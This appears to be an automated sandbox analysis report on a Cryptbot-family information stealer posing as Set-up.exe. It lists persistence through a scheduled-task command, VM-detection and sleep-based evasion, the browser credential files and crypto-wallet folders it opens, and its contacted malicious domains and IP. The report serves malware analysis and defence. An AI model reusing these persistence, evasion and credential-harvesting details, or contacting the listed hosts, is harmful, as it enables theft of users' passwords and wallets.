Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C30048B push eax; mov dword ptr [esp], ebx 4_2_6C3004A1
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3004E0 push eax; mov dword ptr [esp], ebx 4_2_6C3006DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2E1CFA push eax; mov dword ptr [esp], ebx 4_2_6C396622
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2E1CFA push eax; mov dword ptr [esp], ebx 4_2_6C396622
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C30A5A7 push eax; mov dword ptr [esp], ebx 4_2_6C30A5BB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C342620 push eax; mov dword ptr [esp], ebx 4_2_6C342954
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C342620 push edx; mov dword ptr [esp], ebx 4_2_6C342973
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3506B0 push eax; mov dword ptr [esp], ebx 4_2_6C350A4F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3186A1 push 890005EAh; ret 4_2_6C3186A9
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3006A2 push eax; mov dword ptr [esp], ebx 4_2_6C3006DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3006A6 push eax; mov dword ptr [esp], ebx 4_2_6C3006DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3066F3 push edx; mov dword ptr [esp], ebx 4_2_6C306707
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3006FD push eax; mov dword ptr [esp], ebx 4_2_6C3006DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C30070E push eax; mov dword ptr [esp], ebx 4_2_6C3006DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C30A777 push eax; mov dword ptr [esp], ebx 4_2_6C30A78B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C310042 push eax; mov dword ptr [esp], ebx 4_2_6C310056
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2DE0D0 push eax; mov dword ptr [esp], ebx 4_2_6C396AF6
Drops PE files
Source: C:\Users\user\Desktop\Set-up.exe File created: C:\Users\user\AppData\Local\Temp\HXocObpYbsjxnCpoVLwZ.dll Jump to dropped file
Source: C:\Users\user\Desktop\Set-up.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Users\user\Desktop\Set-up.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after checking mutex)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Found stalling execution ending in API Sleep call
Source: C:\Users\user\AppData\Local\Temp\service123.exe Stalling execution: Execution stalls by calling Sleep
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\Set-up.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 980 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\service123.exe API coverage: 1.1 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Set-up.exe TID: 6412 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 2128 Thread sleep count: 980 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 2128 Thread sleep time: -98000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: Set-up.exe Binary or memory string: VMware
Source: Set-up.exe Binary or memory string: !d->m_output_flush_remainingd->m_pOutput_buf < d->m_pOutput_buf_endmax_match_len <= TDEFL_MAX_MATCH_LEN(match_len >= TDEFL_MIN_MATCH_LEN) && (match_dist >= 1) && (match_dist <= TDEFL_LZ_DICT_SIZE)d->m_lookahead_size >= len_to_moveLibrarymetatdummySenhasiduser_data#4user_data#5integrationsOriginREDEngineDataFoldersentryService WorkerMcAfeeScreenPalEpsonFeedsGameDVRUserBenchmarkMovavi Video ConverterVS Revo GroupMovavi Video Editorwebviewuser_dataSavestbs_cache\Hewlett-PackardOISLogishrd.dartServerarduino-ide.arduinoIDEVirtualDJPC ManagerOneDriveGuest ProfilereposiTop Easy DesktopdictionariesSquirrelTempcom.adobe.dunamisMacromediaklnaejjgbibmhlephnhpmaofohgkpgkdaholpfdialjgjfhomihkjbmgjidlcdnoegjidjbpglichdcondbcbdnbeeppgdphefbglgofoippbgcjepnhiblaibcnclgkstoragephantomwalletmonedamonnaie...KeepSolid IncOKmusiWhitehatVpnReasonSaferWebSketchUpF12EAConnect_microsoftEADesktopFPSChessdumpsemojiA7FDF864FBC10B77F8806DD0C461824FAshampooAdguard Software LimitedAdguard_Software_LimitedASUS4kdownload.combluestacks-servicesJxBrowserAuthmailcardfactor%d x %dMicrosoft_CorporationIntel(R)VirtualBoxProgramsblob_storageABBYYChromiumContainerTegraRcmGUIUnrealEngineLauncher.thinkorswimLogiShrdMega LimitedISL Online CacheG HUBlghubWeModGrainemoedathumbnailsAviraD877F783D5D3EF8Cr+bSony CorporationPunkBusterRAV Endpoint ProtectionlinknoweurusdwodlhodlMAGIXVEGAScodecriptIdentityNexusIntegrationNotepad++DBGIsolatedStorageSamsung MagicianHD-Playerhakuneko-desktopBlizzardBattle.netUniSDKODISCLR_v2.0CLR_v2.0_32GamesAGSMy GamesFrontier DevelopmentsfnjhmkhhmkbjkkabndcnnogagogbneecdlcobpjiigpikoobohmabehhmhfoodbbMoises360safeMEmuPC Manager StoreclaveWinampUbisoft Game LauncherAMS SoftwareBlackmagic DesignPhotoWorksNCH SoftwareNitrounknown errorpaint.netMeltytechwindowParams.jsonLogin DataFree_PDF_SolutionsVMwarebitatomProgramDataRufusWindows MediaTypeScriptXboxLiveadspower_global\Docker Desktop\Ledger Live\tof_launcher\Canvadeemixmt-centerThinkBuzanVirtualStorePlaceholderTileLogoFolderApplePlay GamesRobloxPixelSee LLCNeroBGAHelperLibAugLoop3D ObjectsSearchesPublicContinuous MigrationSnapshotsLogsSavedConfigExpressVPNRoute0StreamingVideoProviderOverwolfdiscord.gradlecaches.ipythonHP_Easy_StarttdataCreativeppbibelpcjmhbdihakflkdcoccbgbkpoomaabbefbmiijedngplfjmnooppbclkk3uToolsMarcoMastroddiSWlaunchervshubExcelPowerPointEPSONAMSDKAnkiNoxUnrealEngineWinZipZoomSamsungUI LauncherDevice Metadatagecko_cacheUnityHubTikTok LIVE StudioTeamViewer.thinkbuzanMiniTool Video ConverterDriverPack CloudFlash PlayerResourcedatabasesDawnCacheH}R0}R
Source: Set-up.exe, 00000000.00000002.2324225424.0000000000D75000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: !d->m_output_flush_remainingd->m_pOutput_buf < d->m_pOutput_buf_endmax_match_len <= TDEFL_MAX_MATCH_LEN(match_len >= TDEFL_MIN_MATCH_LEN) && (match_dist >= 1) && (match_dist <= TDEFL_LZ_DICT_SIZE)d->m_lookahead_size >= len_to_moveLibrarymetatdummySenhasiduser_data#4user_data#5integrationsOriginREDEngineDataFoldersentryService WorkerMcAfeeScreenPalEpsonFeedsGameDVRUserBenchmarkMovavi Video ConverterVS Revo GroupMovavi Video Editorwebviewuser_dataSavestbs_cache\Hewlett-PackardOISLogishrd.dartServerarduino-ide.arduinoIDEVirtualDJPC ManagerOneDriveGuest ProfilereposiTop Easy DesktopdictionariesSquirrelTempcom.adobe.dunamisMacromediaklnaejjgbibmhlephnhpmaofohgkpgkdaholpfdialjgjfhomihkjbmgjidlcdnoegjidjbpglichdcondbcbdnbeeppgdphefbglgofoippbgcjepnhiblaibcnclgkstoragephantomwalletmonedamonnaie...KeepSolid IncOKmusiWhitehatVpnReasonSaferWebSketchUpF12EAConnect_microsoftEADesktopFPSChessdumpsemojiA7FDF864FBC10B77F8806DD0C461824FAshampooAdguard Software LimitedAdguard_Software_LimitedASUS4kdownload.combluestacks-servicesJxBrowserAuthmailcardfactor%d x %dMicrosoft_CorporationIntel(R)VirtualBoxProgramsblob_storageABBYYChromiumContainerTegraRcmGUIUnrealEngineLauncher.thinkorswimLogiShrdMega LimitedISL Online CacheG HUBlghubWeModGrainemoedathumbnailsAviraD877F783D5D3EF8Cr+bSony CorporationPunkBusterRAV Endpoint ProtectionlinknoweurusdwodlhodlMAGIXVEGAScodecriptIdentityNexusIntegrationNotepad++DBGIsolatedStorageSamsung MagicianHD-Playerhakuneko-desktopBlizzardBattle.netUniSDKODISCLR_v2.0CLR_v2.0_32GamesAGSMy GamesFrontier DevelopmentsfnjhmkhhmkbjkkabndcnnogagogbneecdlcobpjiigpikoobohmabehhmhfoodbbMoises360safeMEmuPC Manager StoreclaveWinampUbisoft Game LauncherAMS SoftwareBlackmagic DesignPhotoWorksNCH SoftwareNitrounknown errorpaint.netMeltytechwindowParams.jsonLogin DataFree_PDF_SolutionsVMwarebitatomProgramDataRufusWindows MediaTypeScriptXboxLiveadspower_global\Docker Desktop\Ledger Live\tof_launcher\Canvadeemixmt-centerThinkBuzanVirtualStorePlaceholderTileLogoFolderApplePlay GamesRobloxPixelSee LLCNeroBGAHelperLibAugLoop3D ObjectsSearchesPublicContinuous MigrationSnapshotsLogsSavedConfigExpressVPNRoute0StreamingVideoProviderOverwolfdiscord.gradlecaches.ipythonHP_Easy_StarttdataCreativeppbibelpcjmhbdihakflkdcoccbgbkpoomaabbefbmiijedngplfjmnooppbclkk3uToolsMarcoMastroddiSWlaunchervshubExcelPowerPointEPSONAMSDKAnkiNoxUnrealEngineWinZipZoomSamsungUI LauncherDevice Metadatagecko_cacheUnityHubTikTok LIVE StudioTeamViewer.thinkbuzanMiniTool Video ConverterDriverPack CloudFlash PlayerResourcedatabasesDawnCacheH}V0}V
Source: Set-up.exe, 00000000.00000003.2309002492.0000000001455000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2324509023.000000000144F000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1838220618.0000000001455000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1838327408.0000000001455000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Set-up.exe, 00000000.00000002.2324509023.00000000013FE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWH
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_006F8230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 4_2_006F8230
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_006F116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit, 4_2_006F116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_006F1160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 4_2_006F1160
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_006F11A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 4_2_006F11A3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_006F13C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm, 4_2_006F13C9
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe" Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3484D0 cpuid 4_2_6C3484D0
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\Set-up.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Clipboard Hijacker
Source: Yara match File source: 4.2.service123.exe.6c2c0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.2307441720.0000000003F99000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Set-up.exe PID: 7100, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: service123.exe PID: 332, type: MEMORYSTR
Yara detected Cryptbot
Source: Yara match File source: Process Memory Space: Set-up.exe PID: 7100, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: Set-up.exe String found in binary or memory: Electrum BTCP
Source: Set-up.exe String found in binary or memory: \ElectronCash\wallets
Source: Set-up.exe, 00000000.00000002.2324225424.0000000000D75000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: nRAnkamaLGHUBH:I:BitBox WalletTrezor WalletTelegramTelegram ()atomic\Local Storage\leveldb\Exodus\backupExodus backup\MultiBitHDMultiBit HD\Electrum\wallets\ElectronCash\walletsElectron Cash\Electrum-btcp\walletsElectrum BTCP\walletsUnknown Wallet (Folder - wallets)\Desktop\Profiles\\User Data\\Opera Software\no errorundefined errortoo many filesfile too largeunsupported methodunsupported encryptionunsupported featurefailed finding central directorynot a ZIP archiveinvalid header or archive is corruptedunsupported multidisk archivedecompression failed or archive is corruptedcompression failedunexpected decompressed sizeCRC-32 check failedunsupported central directory sizeallocation failedfile open failedfile create failedfile write failedfile read failedfile close failedfile seek failedfile stat failedinvalid parameterinvalid filenamebuffer too smallinternal errorfile not foundarchive is too largevalidation failedwrite callback failedtotal errors
Source: Set-up.exe String found in binary or memory: Jaxx Liberty
Source: Set-up.exe String found in binary or memory: \Exodus\backup
Source: Set-up.exe String found in binary or memory: Exodus Eden
Source: Set-up.exe String found in binary or memory: Ethereum (UTC)
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: Set-up.exe PID: 7100, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Cryptbot
Source: Yara match File source: Process Memory Space: Set-up.exe PID: 7100, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1521577 Sample: Set-up.exe Startdate: 29/09/2024 Architecture: WINDOWS Score: 100 28 elevenvh11pt.top 2->28 36 Suricata IDS alerts for network traffic 2->36 38 Found malware configuration 2->38 40 Yara detected Clipboard Hijacker 2->40 42 5 other signatures 2->42 8 Set-up.exe 4 2->8         started        13 service123.exe 2->13         started        15 service123.exe 2->15         started        signatures3 process4 dnsIp5 30 elevenvh11pt.top 185.244.181.140, 49730, 49732, 49738 BELCLOUDBG Russian Federation 8->30 24 C:\Users\user\AppData\...\service123.exe, PE32 8->24 dropped 26 C:\Users\user\...\HXocObpYbsjxnCpoVLwZ.dll, PE32 8->26 dropped 44 Found many strings related to Crypto-Wallets (likely being stolen) 8->44 46 Uses schtasks.exe or at.exe to add and modify task schedules 8->46 48 Tries to harvest and steal browser information (history, passwords, etc) 8->48 50 Drops large PE files 8->50 17 service123.exe 8->17         started        20 schtasks.exe 1 8->20         started        file6 signatures7 process8 signatures9 32 Found evasive API chain (may stop execution after checking mutex) 17->32 34 Found stalling execution ending in API Sleep call 17->34 22 conhost.exe 20->22         started        process10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.244.181.140
 elevenvh11pt.top Russian Federation
44901 BELCLOUDBG true

Contacted Domains

Name IP Active
elevenvh11pt.top 185.244.181.140 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
@elevenvh11pt.top true
    		unknown
    analforeverlovyu.top true
    • URL Reputation: safe
    		 unknown
    11pt.top true
      		unknown
      elevenvh11pt.top true
        		unknown
        +elevenvh11pt.top true
          		unknown